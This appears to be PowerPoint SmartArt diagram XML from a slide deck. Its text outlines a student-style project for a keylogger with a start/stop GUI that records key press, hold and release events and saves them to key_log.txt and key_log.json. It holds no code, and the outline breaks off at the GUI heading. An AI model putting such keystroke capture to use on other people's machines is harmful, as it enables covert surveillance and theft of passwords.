    <dgm:pt modelId="{5C24623D-FD43-42EA-9B01-ED1D20B0144D}" type="pres">
      <dgm:prSet presAssocID="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}" presName="text_2" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDE292D5-4554-4B0A-BE4B-1DA7B209B00A}" type="pres">
      <dgm:prSet presAssocID="{9F5392A3-0EF3-41E2-98B2-7FF24E053E9D}" presName="picture_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7CDB855-12DB-45D4-85D3-515656097D9D}" type="pres">
      <dgm:prSet presAssocID="{9F5392A3-0EF3-41E2-98B2-7FF24E053E9D}" presName="pictureRepeatNode" presStyleLbl="alignImgPlace1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0119C92F-1E02-4857-9B53-F715C7CBA741}" type="pres">
      <dgm:prSet presAssocID="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}" presName="line_3" presStyleLbl="parChTrans1D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D4A2C87-CE93-4025-B572-4E1210983FAC}" type="pres">
      <dgm:prSet presAssocID="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}" presName="textparent_3" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FDA91FF-5F4B-4D84-8CE4-C489A85F97ED}" type="pres">
      <dgm:prSet presAssocID="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}" presName="text_3" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DAE0711-24FF-4632-A2A9-4E00762392D5}" type="pres">
      <dgm:prSet presAssocID="{05657FBD-32E2-4D52-AC48-F5CD8A57A04F}" presName="picture_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0CE3C8B3-4FAA-49A9-8AE0-30304AD7572E}" type="pres">
      <dgm:prSet presAssocID="{05657FBD-32E2-4D52-AC48-F5CD8A57A04F}" presName="pictureRepeatNode" presStyleLbl="alignImgPlace1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{934C3FD6-427B-4788-AD83-DCC156D9DA56}" type="pres">
      <dgm:prSet presAssocID="{940E49CC-9458-4157-9F13-575EB291A1AF}" presName="line_4" presStyleLbl="parChTrans1D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C93A0C1B-E280-47E7-99B9-2B040B71A702}" type="pres">
      <dgm:prSet presAssocID="{940E49CC-9458-4157-9F13-575EB291A1AF}" presName="textparent_4" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDB8BE79-3DB0-4A7F-BB70-23EC9463146D}" type="pres">
      <dgm:prSet presAssocID="{940E49CC-9458-4157-9F13-575EB291A1AF}" presName="text_4" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CCC0BB01-34FC-4F53-A51E-156CAD7372E0}" type="presOf" srcId="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}" destId="{5C24623D-FD43-42EA-9B01-ED1D20B0144D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{2E82B832-5BCB-4F10-8197-3DE754EB6B92}" type="presOf" srcId="{89A24424-6EDA-45D8-A72C-D3790026D988}" destId="{4443CE90-89FC-4554-A3A3-0EC516799B92}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{9A34BC3D-98D7-4888-A354-0E437C26C534}" type="presOf" srcId="{05657FBD-32E2-4D52-AC48-F5CD8A57A04F}" destId="{0CE3C8B3-4FAA-49A9-8AE0-30304AD7572E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{3E98A140-D6C2-4532-B168-04D83FAA411B}" srcId="{89A24424-6EDA-45D8-A72C-D3790026D988}" destId="{4E1FDEB0-99A6-4320-B1FB-3F95C61BA786}" srcOrd="1" destOrd="0" parTransId="{525D8727-AC1E-430F-8D1F-E7B6DA3039B8}" sibTransId="{EE686D3B-8B07-4DBB-910F-D3CA940E6BFA}"/>
    <dgm:cxn modelId="{2CDF8841-952F-4C38-BEC1-D1C83036C2C4}" type="presOf" srcId="{E7DA6B36-E80E-4410-A7F3-245431950B45}" destId="{5DF800C4-E24C-4DD9-B8A4-DF333F840A4C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{B663D241-AD97-4FFC-A25C-0C8326DCDB6E}" type="presOf" srcId="{F942AD7B-7D80-49D1-B0DC-920D09D883BC}" destId="{F67353A2-478A-41D6-ADDA-0C1C9A45F685}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{DAE79D71-2117-4C3B-A40C-3CF151E2EF8B}" type="presOf" srcId="{9F5392A3-0EF3-41E2-98B2-7FF24E053E9D}" destId="{C7CDB855-12DB-45D4-85D3-515656097D9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{12382756-D8F5-42CC-9008-A27C0EFFE641}" type="presOf" srcId="{EE686D3B-8B07-4DBB-910F-D3CA940E6BFA}" destId="{37B0FEB4-FCDD-4EEA-85F3-4B3EE2BFA535}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{C10A4CA3-E986-46C3-8E89-09D3524E4E93}" srcId="{89A24424-6EDA-45D8-A72C-D3790026D988}" destId="{940E49CC-9458-4157-9F13-575EB291A1AF}" srcOrd="3" destOrd="0" parTransId="{CC6BDCF8-DEFE-4159-883A-A1FC6C2FB6DB}" sibTransId="{05657FBD-32E2-4D52-AC48-F5CD8A57A04F}"/>
    <dgm:cxn modelId="{3ED804AA-DF03-41ED-9D93-4542F4A34BBB}" type="presOf" srcId="{940E49CC-9458-4157-9F13-575EB291A1AF}" destId="{FDB8BE79-3DB0-4A7F-BB70-23EC9463146D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{9778CBDC-9D4F-4E0C-98DC-AA68F3DCECEF}" srcId="{89A24424-6EDA-45D8-A72C-D3790026D988}" destId="{F942AD7B-7D80-49D1-B0DC-920D09D883BC}" srcOrd="0" destOrd="0" parTransId="{1CCC8D4B-2AC7-4312-95DD-3C9968C15F23}" sibTransId="{E7DA6B36-E80E-4410-A7F3-245431950B45}"/>
    <dgm:cxn modelId="{98DE9FE8-7961-46F9-B36F-9772284C995E}" srcId="{89A24424-6EDA-45D8-A72C-D3790026D988}" destId="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}" srcOrd="2" destOrd="0" parTransId="{C3AA87C0-E78D-40D1-8A0A-AA76AEC23C0C}" sibTransId="{9F5392A3-0EF3-41E2-98B2-7FF24E053E9D}"/>
    <dgm:cxn modelId="{0D33E3E8-B137-418C-A6AA-E124DA66E4AE}" type="presOf" srcId="{7A8E1C8C-7AA1-4373-B84A-FFE11734CB99}" destId="{3FDA91FF-5F4B-4D84-8CE4-C489A85F97ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{C31BD3FF-077E-4C7A-A55A-C5AC17715D67}" type="presParOf" srcId="{4443CE90-89FC-4554-A3A3-0EC516799B92}" destId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{65DA0E54-7208-4766-A74D-037A8D786036}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{853E4F57-E0CC-4514-8F94-EB25922F53ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{236949C7-6E53-42D7-8A45-77A21769C0F7}" type="presParOf" srcId="{853E4F57-E0CC-4514-8F94-EB25922F53ED}" destId="{5DF800C4-E24C-4DD9-B8A4-DF333F840A4C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{251F624F-7232-42C9-A820-BC8B49AB9C26}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{F67353A2-478A-41D6-ADDA-0C1C9A45F685}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{6407AF33-B822-458F-862E-E1F66C1D0B3F}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{34E8A4A9-0CE0-4D8C-B17A-0DBE2D154F96}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{159D97FE-3061-47CC-8711-9762DF655EE9}" type="presParOf" srcId="{34E8A4A9-0CE0-4D8C-B17A-0DBE2D154F96}" destId="{37B0FEB4-FCDD-4EEA-85F3-4B3EE2BFA535}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{5017269B-FF67-4A49-849A-2D6FCFE33D08}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{661A007B-7493-43FD-B057-EBE1D7360BA6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{C18C3D58-EA48-4252-A410-ABC58596E73E}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{14ED2BAA-3935-4ACC-8970-0BD2110640EE}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{CC03D4C2-B85D-42AA-85BA-58ED39A3B54D}" type="presParOf" srcId="{14ED2BAA-3935-4ACC-8970-0BD2110640EE}" destId="{5C24623D-FD43-42EA-9B01-ED1D20B0144D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{0E50EC71-F976-4077-A8DB-8F00D1147941}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{EDE292D5-4554-4B0A-BE4B-1DA7B209B00A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{614D7055-B575-461F-95B0-863EE03DFFCC}" type="presParOf" srcId="{EDE292D5-4554-4B0A-BE4B-1DA7B209B00A}" destId="{C7CDB855-12DB-45D4-85D3-515656097D9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{7EB1A206-F17E-43C7-8B52-F253EC02268D}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{0119C92F-1E02-4857-9B53-F715C7CBA741}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{1A778672-75EE-48FD-B594-415AF71BC919}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{0D4A2C87-CE93-4025-B572-4E1210983FAC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{98AA27B2-93DF-4F21-9C27-7323070E7F20}" type="presParOf" srcId="{0D4A2C87-CE93-4025-B572-4E1210983FAC}" destId="{3FDA91FF-5F4B-4D84-8CE4-C489A85F97ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{3A0B6769-FE33-438D-9B7B-877BCCC89810}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{0DAE0711-24FF-4632-A2A9-4E00762392D5}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{1DF22720-F410-40E4-B2B9-85B743655FC2}" type="presParOf" srcId="{0DAE0711-24FF-4632-A2A9-4E00762392D5}" destId="{0CE3C8B3-4FAA-49A9-8AE0-30304AD7572E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{3BF716D7-A9D5-4C5F-BDF8-20BC203BFABC}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{934C3FD6-427B-4788-AD83-DCC156D9DA56}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{03FCA45F-A9F1-4DC5-9ED4-1C400FEDAF11}" type="presParOf" srcId="{C0EDA751-C3EB-47C2-B3BC-5F530D24ED51}" destId="{C93A0C1B-E280-47E7-99B9-2B040B71A702}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/CircularPictureCallout"/>
    <dgm:cxn modelId="{F9D032A7-04DF-4BE6-BBC5-5B15C0A58AEB}" type="presParOf" srcId="{C93A0C1B-E280-47E7-99B9-2B040B71A702}" destId="{FDB8BE79-3DB0-4A7F-BB70-23EC9463146D}" srcOrd="0"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427F3C-DD95-4125-AF8C-DDFA7C0C6575}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DA08E6D-2E89-4818-8A04-166D1F37DC7B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>To create a basic keylogger application with a graphical user interface that allows users to start and stop keylogging, and to log keystrokes in both text and JSON formats (or)  Develop a simple keylogger application with a graphical user interface (GUI) to start and stop keylogging. The application should log all keystrokes and save them in both text and JSON formats.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D8D2532-E60E-4B5F-9E32-40551C7C8AFD}" type="parTrans" cxnId="{D23DABF4-C49F-4B7C-9092-2C8BACB07F78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B9CC4C9-4029-4B8D-8C12-7532E6E4730A}" type="sibTrans" cxnId="{D23DABF4-C49F-4B7C-9092-2C8BACB07F78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6DF7194-8597-4438-AFC6-F605D3066300}" type="pres">
      <dgm:prSet presAssocID="{B6427F3C-DD95-4125-AF8C-DDFA7C0C6575}" presName="CompostProcess" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0018F3EF-C433-46FA-8FA0-204811B1CB85}" type="pres">
      <dgm:prSet presAssocID="{B6427F3C-DD95-4125-AF8C-DDFA7C0C6575}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABB46B59-8626-412D-94AF-0A4936AE0B95}" type="pres">
      <dgm:prSet presAssocID="{B6427F3C-DD95-4125-AF8C-DDFA7C0C6575}" presName="linearProcess" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82B8576A-26DF-4700-B485-F5AAD306401B}" type="pres">
      <dgm:prSet presAssocID="{3DA08E6D-2E89-4818-8A04-166D1F37DC7B}" presName="textNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CAF73609-35EA-4DE0-931A-3DBDEC84ABD3}" type="presOf" srcId="{B6427F3C-DD95-4125-AF8C-DDFA7C0C6575}" destId="{D6DF7194-8597-4438-AFC6-F605D3066300}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{55621C12-6DDC-46BD-A11C-44B062C45DBB}" type="presOf" srcId="{3DA08E6D-2E89-4818-8A04-166D1F37DC7B}" destId="{82B8576A-26DF-4700-B485-F5AAD306401B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{D23DABF4-C49F-4B7C-9092-2C8BACB07F78}" srcId="{B6427F3C-DD95-4125-AF8C-DDFA7C0C6575}" destId="{3DA08E6D-2E89-4818-8A04-166D1F37DC7B}" srcOrd="0" destOrd="0" parTransId="{7D8D2532-E60E-4B5F-9E32-40551C7C8AFD}" sibTransId="{5B9CC4C9-4029-4B8D-8C12-7532E6E4730A}"/>
    <dgm:cxn modelId="{66255E69-7146-433A-BBDA-4D9A67106A3A}" type="presParOf" srcId="{D6DF7194-8597-4438-AFC6-F605D3066300}" destId="{0018F3EF-C433-46FA-8FA0-204811B1CB85}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{F62C7731-D5F3-4895-B313-F896C0A6A89A}" type="presParOf" srcId="{D6DF7194-8597-4438-AFC6-F605D3066300}" destId="{ABB46B59-8626-412D-94AF-0A4936AE0B95}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{75FB0785-AA40-4D43-9EA2-702F4582248C}" type="presParOf" srcId="{ABB46B59-8626-412D-94AF-0A4936AE0B95}" destId="{82B8576A-26DF-4700-B485-F5AAD306401B}"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DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList7" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1.Capture Keystrokes:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF4CB66-56A2-4BA5-82D7-38F812236420}" type="parTrans" cxnId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" type="sibTrans" cxnId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Detect and log each key press, hold, and release event.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA488877-DA8E-4703-9FF8-8686DA823883}" type="parTrans" cxnId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAF11084-F91F-454D-95B8-A943052F3EA4}" type="sibTrans" cxnId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>Store the logged keystrokes in a list.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9ED6A5C-EFED-45CA-A84F-1C980075855A}" type="parTrans" cxnId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FAD7DE8-FE34-4353-B352-BC90F951BBA0}" type="sibTrans" cxnId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>2.Log Storage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DE7DF5D-0521-4B52-BC2B-602FB60E5B01}" type="parTrans" cxnId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC732255-80CD-41DF-A38B-22FBD153AD66}" type="sibTrans" cxnId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33668DFE-79D4-4705-8FD8-931167E899E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Save the keystrokes in a text file named key_log.txt.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38D3A2B4-0AA3-4C89-AE00-F958CFF699C8}" type="parTrans" cxnId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74BB7AB8-3877-4006-8ABF-5C4E57D38899}" type="sibTrans" cxnId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>Save the keystrokes in a JSON file named </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0" err="1"/>
            <a:t>key_log.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EEAC72C-D380-41A1-BF60-F6267D2F7C2F}" type="parTrans" cxnId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EDF53F1-1AAB-4730-8D79-376004E5C59B}" type="sibTrans" cxnId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>3.Graphical User Interface (GUI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
